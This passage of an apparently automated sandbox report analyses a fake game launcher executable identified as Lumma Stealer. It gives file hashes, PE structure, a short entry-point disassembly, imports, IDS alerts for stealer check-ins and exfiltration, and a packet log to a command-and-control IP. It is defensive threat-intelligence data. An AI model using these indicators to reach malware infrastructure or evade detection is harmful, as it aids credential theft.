                                                                                              xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              Aura.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              No context
                                                                                              No created / dropped files found
                                                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.728754242194129
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Call 0f Duty A1 Launcher.exe
                                                                                              File size:495'616 bytes
                                                                                              MD5:fad119b9db79ccbfe3a65a13f0822b22
                                                                                              SHA1:db0992d62adb36a46b493063dd5192bb27422bb9
                                                                                              SHA256:27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
                                                                                              SHA512:41c629c773500fc55b3da2b726045ce88d1f5ae7f35800666c4465bb1d7b8fd3e8aa71e7a99f8c607f64d77916a704e9da7bf0ed2d06844864ad138fe5a2df2f
                                                                                              SSDEEP:12288:SJB+nneDgkXFEIs2Gvih6W8Rd70dDufr3/:2AoR24BhL4r3/
                                                                                              TLSH:60B4F06E3393A0A3E5A3183141D89EB5456E7E300F34A4FB57605BB92F3A6D2C532E17
                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x415870
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows cui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                                              Instruction
                                                                                              call 00007F794D5A4ABAh
                                                                                              jmp 00007F794D5A491Dh
                                                                                              mov ecx, dword ptr [0042B5F0h]
                                                                                              push esi
                                                                                              push edi
                                                                                              mov edi, BB40E64Eh
                                                                                              mov esi, FFFF0000h
                                                                                              cmp ecx, edi
                                                                                              je 00007F794D5A4AB6h
                                                                                              test esi, ecx
                                                                                              jne 00007F794D5A4AD8h
                                                                                              call 00007F794D5A4AE1h
                                                                                              mov ecx, eax
                                                                                              cmp ecx, edi
                                                                                              jne 00007F794D5A4AB9h
                                                                                              mov ecx, BB40E64Fh
                                                                                              jmp 00007F794D5A4AC0h
                                                                                              test esi, ecx
                                                                                              jne 00007F794D5A4ABCh
                                                                                              or eax, 00004711h
                                                                                              shl eax, 10h
                                                                                              or ecx, eax
                                                                                              mov dword ptr [0042B5F0h], ecx
                                                                                              not ecx
                                                                                              pop edi
                                                                                              mov dword ptr [0042B5ECh], ecx
                                                                                              pop esi
                                                                                              ret
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 14h
                                                                                              and dword ptr [ebp-0Ch], 00000000h
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              and dword ptr [ebp-08h], 00000000h
                                                                                              push eax
                                                                                              call dword ptr [0042946Ch]
                                                                                              mov eax, dword ptr [ebp-08h]
                                                                                              xor eax, dword ptr [ebp-0Ch]
                                                                                              mov dword ptr [ebp-04h], eax
                                                                                              call dword ptr [00429430h]
                                                                                              xor dword ptr [ebp-04h], eax
                                                                                              call dword ptr [0042942Ch]
                                                                                              xor dword ptr [ebp-04h], eax
                                                                                              lea eax, dword ptr [ebp-14h]
                                                                                              push eax
                                                                                              call dword ptr [004294A8h]
                                                                                              mov eax, dword ptr [ebp-10h]
                                                                                              lea ecx, dword ptr [ebp-04h]
                                                                                              xor eax, dword ptr [ebp-14h]
                                                                                              xor eax, dword ptr [ebp-04h]
                                                                                              xor eax, ecx
                                                                                              leave
                                                                                              ret
                                                                                              mov eax, 00004000h
                                                                                              ret
                                                                                              push 0042C970h
                                                                                              call dword ptr [00429488h]
                                                                                              ret
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              mov al, 01h
                                                                                              ret
                                                                                              push 00030000h
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              .coS0x310000x4d8000x4d800dadefaca19565602088c9505a810b233False1.0003339213709677data7.999391001565712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              DLLImport
                                                                                              KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                              GDI32.dllCreateEllipticRgn
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-11-23T15:05:59.751154+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.33.116443TCP
                                                                                              2024-11-23T15:06:00.435968+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.33.116443TCP
                                                                                              2024-11-23T15:06:00.435968+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.33.116443TCP
                                                                                              2024-11-23T15:06:01.704643+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.33.116443TCP
                                                                                              2024-11-23T15:06:02.409509+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.33.116443TCP
                                                                                              2024-11-23T15:06:02.409509+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.33.116443TCP
                                                                                              2024-11-23T15:06:04.285115+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.33.116443TCP
                                                                                              2024-11-23T15:06:06.513365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.33.116443TCP
                                                                                              2024-11-23T15:06:08.727761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.33.116443TCP
                                                                                              2024-11-23T15:06:11.203989+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.33.116443TCP
                                                                                              2024-11-23T15:06:11.941657+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735104.21.33.116443TCP
                                                                                              2024-11-23T15:06:13.720808+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.33.116443TCP
                                                                                              2024-11-23T15:06:17.766046+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.33.116443TCP
                                                                                              2024-11-23T15:06:18.463443+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.33.116443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 23, 2024 15:05:58.375926018 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:58.375977993 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:05:58.376075983 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:58.379306078 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:58.379323006 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:05:59.751030922 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:05:59.751153946 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:59.753099918 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:59.753110886 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:05:59.753523111 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:05:59.793725967 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:59.823849916 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:59.823874950 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:05:59.823987007 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:00.435988903 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:00.436116934 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:00.436193943 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:00.439770937 CET49730443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:00.439795971 CET44349730104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:00.483357906 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:00.483455896 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:00.483558893 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:00.483810902 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:00.483848095 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:01.704385996 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:01.704643011 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:01.705905914 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:01.705919027 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:01.706317902 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:01.707701921 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:01.707731962 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:01.707802057 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409524918 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409586906 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409627914 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409663916 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.409670115 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409698963 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409723997 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.409746885 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.409782887 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.409790039 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.415693998 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.415760994 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.415770054 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.432634115 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.432683945 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.432693958 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.481215954 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.529750109 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.574951887 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.574975967 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.600833893 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.600927114 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.600944996 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.600977898 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.601027012 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.634746075 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.634776115 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:02.634790897 CET49731443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:02.634798050 CET44349731104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:03.069087029 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:03.069154024 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:03.069224119 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:03.069647074 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:03.069660902 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:04.284770012 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:04.285115004 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:04.286215067 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:04.286228895 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:04.287175894 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:04.288364887 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:04.288521051 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:04.288563013 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:04.288641930 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:04.288657904 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:05.094767094 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:05.095021009 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:05.095046043 CET44349732104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:05.095099926 CET49732443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:05.164247036 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:05.164288044 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:05.164352894 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:05.164733887 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:05.164747000 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:06.513289928 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:06.513365030 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:06.514499903 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:06.514513016 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:06.515393019 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:06.516498089 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:06.516594887 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:06.516625881 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:07.265903950 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:07.266187906 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:07.266307116 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:07.266485929 CET49733443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:07.266511917 CET44349733104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:07.465239048 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:07.465316057 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:07.465414047 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:07.465828896 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:07.465842962 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:08.727663040 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:08.727761030 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:08.729060888 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:08.729070902 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:08.729381084 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:08.730477095 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:08.730626106 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:08.730658054 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:08.730716944 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:08.730726004 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:09.625839949 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:09.626087904 CET44349734104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:09.626249075 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:09.626249075 CET49734443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:09.929033041 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:09.929081917 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:09.929162025 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:09.929461956 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:09.929475069 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.203865051 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.203989029 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.205755949 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.205769062 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.206197977 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.207724094 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.207822084 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.207832098 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.941689014 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.941827059 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:11.941927910 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.942109108 CET49735443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:11.942132950 CET44349735104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:12.459300995 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:12.459367037 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:12.459542036 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:12.459822893 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:12.459836960 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.720710039 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.720808029 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.728995085 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.729016066 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.729512930 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.741194010 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.745125055 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.745193005 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.745399952 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.745456934 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.745568991 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.745824099 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.745945930 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.745986938 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746134043 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746182919 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746323109 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746354103 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746366978 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746381044 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746486902 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746526003 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746541023 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746649981 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.746678114 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746716022 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.746737957 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.791352034 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:13.791510105 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.791562080 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.791588068 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:13.839345932 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:14.202658892 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:16.525747061 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:16.525881052 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:16.525979996 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:16.528615952 CET49736443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:16.528642893 CET44349736104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:16.546622992 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:16.546662092 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:16.546753883 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:16.547245979 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:16.547257900 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:17.765976906 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:17.766046047 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:17.788995028 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:17.789015055 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:17.790041924 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:17.811683893 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:17.811713934 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:17.811861992 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.463454008 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.463568926 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.463685989 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:18.463885069 CET49738443192.168.2.4104.21.33.116
                                                                                              Nov 23, 2024 15:06:18.463937044 CET44349738104.21.33.116192.168.2.4
                                                                                              Nov 23, 2024 15:06:18.463970900 CET49738443192.168.2.4104.21.33.116
